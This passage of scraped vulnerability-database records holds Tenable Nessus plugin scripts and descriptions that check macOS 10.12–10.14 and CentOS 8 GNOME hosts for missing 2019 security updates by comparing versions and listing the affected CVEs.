(CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601,CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615,\n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the operating system's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210119\");\n script_set_attribute(attribute:\"solution\", value:\"Install Security Update 2019-003 or later for 10.12.x or Security\nUpdate 2019-003 or later for 10.13.x\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4456\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_ports(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.1[2-3]\\.\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.12.x / 10.13.x\");\n\npatch = \"2019-003\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n matches = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(matches)) continue;\n if (empty_or_null(matches[1]) || empty_or_null(matches[2]))\n continue;\n\n patch_found = check_patch(year:int(matches[1]), number:int(matches[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-29T00:22:12", "description": "The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.5. It is, therefore, affected by multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616, CVE-2019-8629, CVE-2018-4456, CVE-2019-8604,CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied only on the operating system's self-reported version number.", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "macOS 10.14.x < 10.14.5 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-4456", "CVE-2019-6237", "CVE-2019-8560", "CVE-2019-8568", "CVE-2019-8569", "CVE-2019-8571", "CVE-2019-8574", "CVE-2019-8576", "CVE-2019-8577", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8585", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8589", "CVE-2019-8590", "CVE-2019-8591", "CVE-2019-8592", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8598", "CVE-2019-8600", "CVE-2019-8601", "CVE-2019-8602", "CVE-2019-8603", "CVE-2019-8604", "CVE-2019-8605", "CVE-2019-8606", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8616", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628", "CVE-2019-8629", "CVE-2019-8634", "CVE-2019-8635"], "modified": "2019-12-13T00:00:00", "cpe": ["cpe:/o:apple:mac_os_x", "cpe:/o:apple:macos"], "id": "MACOS_10_14_5.NASL", "href": "https://www.tenable.com/plugins/nessus/125150", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(125150);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2018-4456\",\n \"CVE-2019-6237\",\n \"CVE-2019-8560\",\n \"CVE-2019-8568\",\n \"CVE-2019-8569\",\n \"CVE-2019-8571\",\n \"CVE-2019-8574\",\n \"CVE-2019-8576\",\n \"CVE-2019-8577\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8585\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8589\",\n \"CVE-2019-8590\",\n \"CVE-2019-8591\",\n \"CVE-2019-8592\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8598\",\n \"CVE-2019-8600\",\n \"CVE-2019-8601\",\n \"CVE-2019-8602\",\n \"CVE-2019-8603\",\n \"CVE-2019-8604\",\n \"CVE-2019-8605\",\n \"CVE-2019-8606\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8616\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8628\",\n \"CVE-2019-8629\",\n \"CVE-2019-8634\",\n \"CVE-2019-8635\"\n );\n script_xref(name:\"APPLE-SA\", value:\"HT210119\");\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2019-05-09\");\n\n script_name(english:\"macOS 10.14.x < 10.14.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is missing a macOS update that fixes multiple\nvulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of macOS / Mac OS X that is 10.14.x prior to 10.14.5. It is, therefore, affected \nby multiple vulnerabilities :\n\n - An application may be able to read restricted memory (CVE-2019-8603, CVE-2019-8560)\n\n - An application may be able to execute arbitrary code with system privileges (CVE-2019-8635, CVE-2019-8616, \n CVE-2019-8629, CVE-2018-4456, CVE-2019-8604,CVE-2019-8574, CVE-2019-8569)\n\n - An application may be able to execute arbitrary code with kernel privileges (CVE-2019-8590)\n\n - Processing a maliciously crafted audio file may lead to arbitrary code execution (CVE-2019-8592)\n\n - Processing a maliciously crafted movie file may lead to arbitrary code execution (CVE-2019-8585)\n\n - A malicious application may bypass Gatekeeper checks (CVE-2019-8589)\n\n - A malicious application may be able to read restricted memory (CVE-2019-8560, CVE-2019-8598)\n\n - A user may be unexpectedly logged in to another users account (CVE-2019-8634)\n\n - A local user may be able to load unsigned kernel extensions (CVE-2019-8606)\n\n - A malicious application may be able to execute arbitrary code with system privileges (CVE-2019-8605)\n\n - A local user may be able to cause unexpected system termination or read kernel memory (CVE-2019-8576)\n\n - An application may be able to cause unexpected system termination or write kernel memory (CVE-2019-8591)\n\n - An application may be able to gain elevated privileges (CVE-2019-8577)\n\n - A maliciously crafted SQL query may lead to arbitrary code execution (CVE-2019-8600)\n\n - A malicious application may be able to elevate privileges (CVE-2019-8602)\n\n - A local user may be able to modify protected parts of the file system (CVE-2019-8568)\n\n - Processing maliciously crafted web content may lead to arbitrary code execution (CVE-2019-6237, CVE-2019-8571,\n CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, \n CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, \n CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)\n\n - Processing maliciously crafted web content may result in the disclosure of process memory (CVE-2019-8607)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the operating system's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT210119\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to macOS version 10.14.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-4456\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nfix = \"10.14.5\";\nminver = \"10.14\";\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif (empty_or_null(matches)) exit(1, \"Failed to parse the macOS / Mac OS X version ('\" + os + \"').\");\n\nversion = matches[1];\n\nif (ver_compare(ver:version, minver:minver, fix:fix, strict:FALSE) == -1)\n{\n security_report_v4(\n port:0,\n severity:SECURITY_HOLE,\n extra:\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n'\n );\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"macOS / Mac OS X\", version);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T15:22:40", "description": "The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the CESA-2019:3553 advisory.\n\n - webkitgtk: HTTP proxy setting deanonymization information disclosure (CVE-2019-11070)\n\n - evince: uninitialized memory use in function tiff_document_render() and tiff_document_get_thumbnail() (CVE-2019-11459)\n\n - gvfs: improper authorization in daemon/gvfsdaemon.c in gvfsd (CVE-2019-12795)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8666, CVE-2019-8671, CVE-2019-8672, CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8679, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687, CVE-2019-8689, CVE-2019-8726, CVE-2019-8735)\n\n - webkitgtk: processing maliciously crafted web content lead to URI spoofing (CVE-2019-6251)\n\n - webkitgtk: malicous web content leads to arbitrary code execution (CVE-2019-8506)\n\n - webkitgtk: malicious web content leads to arbitrary code execution (CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8559, CVE-2019-8563)\n\n - webkitgtk: malicious crafted web content leads to arbitrary code execution (CVE-2019-8535, CVE-2019-8536, CVE-2019-8558)\n\n - webkitgtk: malicious crafted web content leads to arbitrary we content (CVE-2019-8544)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8690)\n\n - webkitgtk: Browsing history could not be deleted (CVE-2019-8768)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "nessus", "title": "CentOS 8 : GNOME (CESA-2019:3553)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-11459", "CVE-2019-12795", "CVE-2019-6237", "CVE-2019-6251", "CVE-2019-8506", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8666", "CVE-2019-8671", "CVE-2019-8672", "CVE-2019-8673", "CVE-2019-8676", "CVE-2019-8677", "CVE-2019-8679", "CVE-2019-8681", "CVE-2019-8686", "CVE-2019-8687", "CVE-2019-8689", "CVE-2019-8690", "CVE-2019-8726", "CVE-2019-8735", "CVE-2019-8768"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:centos:centos:8", "p-cpe:/a:centos:centos:sdl", "p-cpe:/a:centos:centos:sdl-devel", "p-cpe:/a:centos:centos:accountsservice", "p-cpe:/a:centos:centos:accountsservice-devel", "p-cpe:/a:centos:centos:accountsservice-libs", "p-cpe:/a:centos:centos:appstream-data", "p-cpe:/a:centos:centos:baobab", "p-cpe:/a:centos:centos:chrome-gnome-shell", "p-cpe:/a:centos:centos:evince", "p-cpe:/a:centos:centos:evince-browser-plugin", "p-cpe:/a:centos:centos:evince-libs", "p-cpe:/a:centos:centos:evince-nautilus", "p-cpe:/a:centos:centos:file-roller", "p-cpe:/a:centos:centos:gdk-pixbuf2", "p-cpe:/a:centos:centos:gdk-pixbuf2-devel", "p-cpe:/a:centos:centos:gdk-pixbuf2-modules", "p-cpe:/a:centos:centos:gdk-pixbuf2-xlib", "p-cpe:/a:centos:centos:gdk-pixbuf2-xlib-devel", "p-cpe:/a:centos:centos:gdm", "p-cpe:/a:centos:centos:gjs", "p-cpe:/a:centos:centos:gjs-devel", "p-cpe:/a:centos:centos:gnome-classic-session", "p-cpe:/a:centos:centos:gnome-control-center", "p-cpe:/a:centos:centos:gnome-control-center-filesystem", "p-cpe:/a:centos:centos:gnome-desktop3", "p-cpe:/a:centos:centos:gnome-desktop3-devel", "p-cpe:/a:centos:centos:gnome-remote-desktop", "p-cpe:/a:centos:centos:gnome-settings-daemon", "p-cpe:/a:centos:centos:gnome-shell", "p-cpe:/a:centos:centos:gnome-shell-extension-apps-menu", "p-cpe:/a:centos:centos:gnome-shell-extension-auto-move-windows", "p-cpe:/a:centos:centos:gnome-shell-extension-common", "p-cpe:/a:centos:centos:gnome-shell-extension-dash-to-dock", "p-cpe:/a:centos:centos:gnome-shell-extension-desktop-icons", "p-cpe:/a:centos:centos:gnome-shell-extension-disable-screenshield", "p-cpe:/a:centos:centos:gnome-shell-extension-drive-menu", "p-cpe:/a:centos:centos:gnome-shell-extension-horizontal-workspaces", "p-cpe:/a:centos:centos:gnome-shell-extension-launch-new-instance", "p-cpe:/a:centos:centos:gnome-shell-extension-native-window-placement", "p-cpe:/a:centos:centos:gnome-shell-extension-no-hot-corner", "p-cpe:/a:centos:centos:gnome-shell-extension-panel-favorites", "p-cpe:/a:centos:centos:gnome-shell-extension-places-menu", "p-cpe:/a:centos:centos:gnome-shell-extension-screenshot-window-sizer", "p-cpe:/a:centos:centos:gnome-shell-extension-systemmonitor", "p-cpe:/a:centos:centos:gnome-shell-extension-top-icons", "p-cpe:/a:centos:centos:gnome-shell-extension-updates-dialog", "p-cpe:/a:centos:centos:gnome-shell-extension-user-theme", "p-cpe:/a:centos:centos:gnome-shell-extension-window-grouper", "p-cpe:/a:centos:centos:gnome-shell-extension-window-list", "p-cpe:/a:centos:centos:gnome-shell-extension-windowsnavigator", "p-cpe:/a:centos:centos:gnome-shell-extension-workspace-indicator", "p-cpe:/a:centos:centos:gnome-software", "p-cpe:/a:centos:centos:gnome-software-editor", "p-cpe:/a:centos:centos:gnome-tweaks", "p-cpe:/a:centos:centos:gsettings-desktop-schemas", "p-cpe:/a:centos:centos:gsettings-desktop-schemas-devel", "p-cpe:/a:centos:centos:gtk-update-icon-cache", "p-cpe:/a:centos:centos:gtk3", "p-cpe:/a:centos:centos:gtk3-devel", "p-cpe:/a:centos:centos:gtk3-immodule-xim", "p-cpe:/a:centos:centos:gvfs", "p-cpe:/a:centos:centos:gvfs-afc", "p-cpe:/a:centos:centos:gvfs-afp", "p-cpe:/a:centos:centos:gvfs-archive", "p-cpe:/a:centos:centos:gvfs-client", "p-cpe:/a:centos:centos:gvfs-devel", "p-cpe:/a:centos:centos:gvfs-fuse", "p-cpe:/a:centos:centos:mutter", "p-cpe:/a:centos:centos:gvfs-goa", "p-cpe:/a:centos:centos:gvfs-gphoto2", "p-cpe:/a:centos:centos:gvfs-mtp", "p-cpe:/a:centos:centos:mutter-devel", "p-cpe:/a:centos:centos:gvfs-smb", "p-cpe:/a:centos:centos:nautilus", "p-cpe:/a:centos:centos:libpurple", "p-cpe:/a:centos:centos:libpurple-devel", "p-cpe:/a:centos:centos:mozjs60", "p-cpe:/a:centos:centos:nautilus-devel", "p-cpe:/a:centos:centos:mozjs60-devel", "p-cpe:/a:centos:centos:pango", "p-cpe:/a:centos:centos:nautilus-extensions", "p-cpe:/a:centos:centos:pango-devel", "p-cpe:/a:centos:centos:pidgin", "p-cpe:/a:centos:centos:pidgin-devel", "p-cpe:/a:centos:centos:plymouth", "p-cpe:/a:centos:centos:plymouth-core-libs", "p-cpe:/a:centos:centos:plymouth-graphics-libs", "p-cpe:/a:centos:centos:plymouth-plugin-fade-throbber", "p-cpe:/a:centos:centos:plymouth-plugin-label", "p-cpe:/a:centos:centos:plymouth-plugin-script", "p-cpe:/a:centos:centos:plymouth-plugin-space-flares", "p-cpe:/a:centos:centos:plymouth-plugin-throbgress", "p-cpe:/a:centos:centos:plymouth-plugin-two-step", "p-cpe:/a:centos:centos:plymouth-scripts", "p-cpe:/a:centos:centos:plymouth-system-theme", "p-cpe:/a:centos:centos:plymouth-theme-charge", "p-cpe:/a:centos:centos:plymouth-theme-fade-in", "p-cpe:/a:centos:centos:plymouth-theme-script", "p-cpe:/a:centos:centos:plymouth-theme-solar", "p-cpe:/a:centos:centos:plymouth-theme-spinfinity", "p-cpe:/a:centos:centos:plymouth-theme-spinner", "p-cpe:/a:centos:centos:wayland-protocols-devel", "p-cpe:/a:centos:centos:webkit2gtk3", "p-cpe:/a:centos:centos:webkit2gtk3-devel", "p-cpe:/a:centos:centos:webkit2gtk3-jsc", "p-cpe:/a:centos:centos:webkit2gtk3-jsc-devel", "p-cpe:/a:centos:centos:webkit2gtk3-plugin-process-gtk2"], "id": "CENTOS8_RHSA-2019-3553.NASL", "href": "https://www.tenable.com/plugins/nessus/145653", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from\n# Red Hat Security Advisory RHSA-2019:3553. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145653);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2019-6237\",\n \"CVE-2019-6251\",\n \"CVE-2019-8506\",\n \"CVE-2019-8518\",\n \"CVE-2019-8523\",\n \"CVE-2019-8524\",\n \"CVE-2019-8535\",\n \"CVE-2019-8536\",\n \"CVE-2019-8544\",\n \"CVE-2019-8558\",\n \"CVE-2019-8559\",\n \"CVE-2019-8563\",\n \"CVE-2019-8571\",\n \"CVE-2019-8583\",\n \"CVE-2019-8584\",\n \"CVE-2019-8586\",\n \"CVE-2019-8587\",\n \"CVE-2019-8594\",\n \"CVE-2019-8595\",\n \"CVE-2019-8596\",\n \"CVE-2019-8597\",\n \"CVE-2019-8601\",\n \"CVE-2019-8607\",\n \"CVE-2019-8608\",\n \"CVE-2019-8609\",\n \"CVE-2019-8610\",\n \"CVE-2019-8611\",\n \"CVE-2019-8615\",\n \"CVE-2019-8619\",\n \"CVE-2019-8622\",\n \"CVE-2019-8623\",\n \"CVE-2019-8666\",\n \"CVE-2019-8671\",\n \"CVE-2019-8672\",\n \"CVE-2019-8673\",\n \"CVE-2019-8676\",\n \"CVE-2019-8677\",\n \"CVE-2019-8679\",\n \"CVE-2019-8681\",\n \"CVE-2019-8686\",\n \"CVE-2019-8687\",\n \"CVE-2019-8689\",\n \"CVE-2019-8690\",\n \"CVE-2019-8726\",\n \"CVE-2019-8735\",\n \"CVE-2019-8768\",\n \"CVE-2019-11070\",\n \"CVE-2019-11459\",\n \"CVE-2019-12795\"\n );\n script_bugtraq_id(\n 108497,\n 108566,\n 108741,\n 109328,\n 109329\n );\n script_xref(name:\"RHSA\", value:\"2019:3553\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/25\");\n\n script_name(english:\"CentOS 8 : GNOME (CESA-2019:3553)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote CentOS Linux 8 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nCESA-2019:3553 advisory.\n\n - webkitgtk: HTTP proxy setting deanonymization information disclosure (CVE-2019-11070)\n\n - evince: uninitialized memory use in function tiff_document_render() and tiff_document_get_thumbnail()\n (CVE-2019-11459)\n\n - gvfs: improper authorization in daemon/gvfsdaemon.c in gvfsd (CVE-2019-12795)\n\n - webkitgtk: Multiple memory corruption issues leading to arbitrary code execution (CVE-2019-6237,\n CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\n CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611,\n CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8666, CVE-2019-8671, CVE-2019-8672,\n CVE-2019-8673, CVE-2019-8676, CVE-2019-8677, CVE-2019-8679, CVE-2019-8681, CVE-2019-8686, CVE-2019-8687,\n CVE-2019-8689, CVE-2019-8726, CVE-2019-8735)\n\n - webkitgtk: processing maliciously crafted web content lead to URI spoofing (CVE-2019-6251)\n\n - webkitgtk: malicous web content leads to arbitrary code execution (CVE-2019-8506)\n\n - webkitgtk: malicious web content leads to arbitrary code execution (CVE-2019-8518, CVE-2019-8523,\n CVE-2019-8524, CVE-2019-8559, CVE-2019-8563)\n\n - webkitgtk: malicious crafted web content leads to arbitrary code execution (CVE-2019-8535, CVE-2019-8536,\n CVE-2019-8558)\n\n - webkitgtk: malicious crafted web content leads to arbitrary we content (CVE-2019-8544)\n\n - webkitgtk: Out-of-bounds read leading to memory disclosure (CVE-2019-8607)\n\n - webkitgtk: Incorrect state management leading to universal cross-site scripting (CVE-2019-8690)\n\n - webkitgtk: Browsing history could not be deleted (CVE-2019-8768)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2019:3553\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-8689\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2019-8735\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/11/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:SDL\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:SDL-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:accountsservice\");\n script_set_attribute(attribute:\"cpe\", 